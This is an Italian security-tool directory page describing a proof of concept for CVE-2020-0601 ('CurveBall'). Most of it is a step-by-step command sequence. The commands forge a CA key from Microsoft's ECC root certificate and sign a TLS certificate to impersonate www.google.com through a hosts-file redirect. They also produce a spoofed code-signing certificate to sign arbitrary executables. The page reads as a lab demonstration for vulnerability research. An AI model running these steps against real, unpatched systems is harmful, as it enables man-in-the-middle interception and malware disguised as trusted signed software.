Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-0601_PoC — Dimostrazione di CVE-2020-0601, noto anche come curveball. Basato sui PoC disponibili su https://github.com/kudelskisecurity/chainoffools e https://github.com/ly4k/CurveBall | Kitploit
Strumenti/GitHubGitHub/joelbts/cve-2020-0601_poc
Analisi delle VulnerabilitàAnalisi del CodiceExploitSicurezza WebCrittografiaPenetration Testing
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Dimostrazione di CVE-2020-0601, noto anche come curveball. Basato sui PoC disponibili su https://github.com/kudelskisecurity/chainoffools e https://github.com/ly4k/CurveBall

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Basato sul POC di https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


REQUISITI/SOFTWARE UTILIZZATO


python versione 3.11 openssl versione 3.1 osslsigncode versione 2.5 librerie python in gen-key.py httpServer.py


FIRMA DI CERTIFICATI TLS


Crea una chiave CA contraffatta dal certificato radice attendibile (deve essere secp384r1 e in formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crea una CA contraffatta usando la chiave contraffatta

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Crea un altro certificato SSL (di qualsiasi tipo) che verrà firmato dalla CA contraffatta

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crea una richiesta di firma del certificato (CSR) per il certificato

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Firma la CSR usando il certificato della CA contraffatta

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Avvia un server HTTPS con la catena di certificati contraffatta

python httpServer.py

SU MACCHINA WINDOWS

Aggiungi <kali.machine.ip> www.google.com al file hosts (reindirizza google al server)

visita HTTPS://www.google.com

Il certificato dovrebbe essere considerato attendibile e dovrebbe essere visualizzato 'Hello World'

Se si verifica un errore, controlla che l'ora di sistema sia corretta


FIRMA DEL CODICE


Crea una chiave CA contraffatta dal certificato radice attendibile (deve essere secp384r1 e in formato PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Crea una CA contraffatta usando la chiave contraffatta

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Crea una nuova chiave che può essere usata per la firma del codice

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Crea una richiesta di firma del certificato usando la chiave, che possiamo firmare

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Firma la CSR usando la CA contraffatta

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Impacchetta la chiave, il certificato e la CA contraffatta in un file PKCS12 per firmare gli eseguibili

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Usa il file PKCS12 per firmare un eseguibile

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

Scarica lo strumento